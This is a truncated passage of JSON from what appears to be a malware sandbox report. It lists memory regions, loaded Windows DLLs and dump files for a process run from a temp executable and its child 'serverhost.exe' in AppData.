65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_883", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:54.532", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000884-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_142", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_884", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:00:54.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1261567, "entry_point": 0, "filename": null, "id": "region_885", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:00:54.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4300799, "entry_point": 4200000, "filename": "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", "id": "region_886", "name": "42753.exe", "norm_filename": "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:54.532", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_887", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:54.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_888", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:54.533", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_889", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:54.535", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000890-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_143", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_890", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:54.535", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000891-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_144", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_891", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:54.536", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_892", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:54.551", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1732607, "entry_point": 1310720, "filename": "\\Windows\\System32\\locale.nls", "id": "region_893", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1310720, "timestamp": "00:00:54.551", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000894-addr_0x00000000001f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_145", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3080191, "entry_point": 0, "filename": null, "id": "region_894", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:00:54.551", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000895-addr_0x0000000000560000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_146", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 5701631, "entry_point": 0, "filename": null, "id": "region_895", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:00:54.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1716224, "start_va": 1604255744, "type": "region", "version": 1 }, "end_va": 1605971967, "entry_point": 1604380693, "filename": "\\Windows\\System32\\esent.dll", "id": "region_896", "name": "esent.dll", "norm_filename": "c:\\windows\\system32\\esent.dll", "region_type": "memory_mapped_file", "start_va": 1604255744, "timestamp": "00:00:54.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_897", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:00:54.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2359296, "start_va": 1895563264, "type": "region", "version": 1 }, "end_va": 1897922559, "entry_point": 1895589565, "filename": "\\Windows\\System32\\msi.dll", "id": "region_898", "name": "msi.dll", "norm_filename": "c:\\windows\\system32\\msi.dll", "region_type": "memory_mapped_file", "start_va": 1895563264, "timestamp": "00:00:54.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_899", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:54.553", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_900", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:54.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_901", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:54.554", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1971978240, "type": "region", "version": 1 }, "end_va": 1984864255, "entry_point": 1972508161, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_902", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1971978240, "timestamp": "00:00:54.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_903", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:54.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_904", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:54.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 503808, "start_va": 1986461696, "type": "region", "version": 1 }, "end_va": 1986965503, "entry_point": 1986468590, "filename": "\\Windows\\System32\\comdlg32.dll", "id": "region_905", "name": "comdlg32.dll", "norm_filename": "c:\\windows\\system32\\comdlg32.dll", "region_type": "memory_mapped_file", "start_va": 1986461696, "timestamp": "00:00:54.556", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_906", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:54.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_907", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:54.557", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_908", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:54.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_909", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:54.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1991864319, "entry_point": 1991613350, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_910", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:00:54.558", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_911", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:54.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1997799424, "type": "region", "version": 1 }, "end_va": 1999224831, "entry_point": 1998109245, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_912", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1997799424, "timestamp": "00:00:54.559", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_913", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:54.560", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000914-addr_0x00000000002f0000-size_0x00000000000c0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_147", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 786432, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3866623, "entry_point": 0, "filename": null, "id": "region_914", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:00:54.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2000617472, "type": "region", "version": 1 }, "end_va": 2000637951, "entry_point": 2000622648, "filename": "\\Windows\\System32\\psapi.dll", "id": "region_915", "name": "psapi.dll", "norm_filename": "c:\\windows\\system32\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2000617472, "timestamp": "00:00:54.561", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 5144575, "entry_point": 0, "filename": null, "id": "region_916", "name": "pagefile_0x0000000000420000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4325376, "timestamp": "00:00:54.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_917", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:54.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_918", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:54.566", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000919-addr_0x0000000000020000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_148", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_919", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:00:54.579", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000920-addr_0x00000000001b0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_149", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1769472, "type": "region", "version": 1 }, "end_va": 1773567, "entry_point": 0, "filename": null, "id": "region_920", "name": "private_0x00000000001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1769472, "timestamp": "00:00:54.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 6754303, "entry_point": 0, "filename": null, "id": "region_921", "name": "pagefile_0x0000000000570000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5701632, "timestamp": "00:00:54.579", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 19398655, "entry_point": 0, "filename": null, "id": "region_922", "name": "pagefile_0x0000000000680000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6815744, "timestamp": "00:00:54.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000923-addr_0x00000000013e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_150", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 20840448, "type": "region", "version": 1 }, "end_va": 20905983, "entry_point": 0, "filename": null, "id": "region_923", "name": "private_0x00000000013e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 20840448, "timestamp": "00:00:54.580", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000924-addr_0x00000000001c0000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_151", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1908735, "entry_point": 0, "filename": null, "id": "region_924", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:00:54.582", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000925-addr_0x00000000001e0000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_152", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2019327, "entry_point": 0, "filename": null, "id": "region_925", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:54.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 360448, "start_va": 1906376704, "type": "region", "version": 1 }, "end_va": 1906737151, "entry_point": 1906381748, "filename": "\\Windows\\System32\\winhttp.dll", "id": "region_926", "name": "winhttp.dll", "norm_filename": "c:\\windows\\system32\\winhttp.dll", "region_type": "memory_mapped_file", "start_va": 1906376704, "timestamp": "00:00:54.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1906049024, "type": "region", "version": 1 }, "end_va": 1906372607, "entry_point": 1906054226, "filename": "\\Windows\\System32\\webio.dll", "id": "region_927", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1906049024, "timestamp": "00:00:54.757", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_928", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:00:54.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_929", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:00:54.762", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_930", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:00:54.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1991901184, "type": "region", "version": 1 }, "end_va": 1992486911, "entry_point": 1991917489, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_931", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1991901184, "timestamp": "00:00:54.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_932", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:00:54.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_933", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:00:54.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_934", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:54.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 20905984, "type": "region", "version": 1 }, "end_va": 23851007, "entry_point": 20905984, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_935", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 20905984, "timestamp": "00:00:54.920", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000005-region_00000936-addr_0x00000000003b0000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_153", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 3919871, "entry_point": 0, "filename": null, "id": "region_936", "name": "private_0x00000000003b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3866624, "timestamp": "00:00:54.988", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_6", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 6, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000006-region_00000937-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_154", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_937", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:56.784", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00000938-addr_0x0000000000030000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_155", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 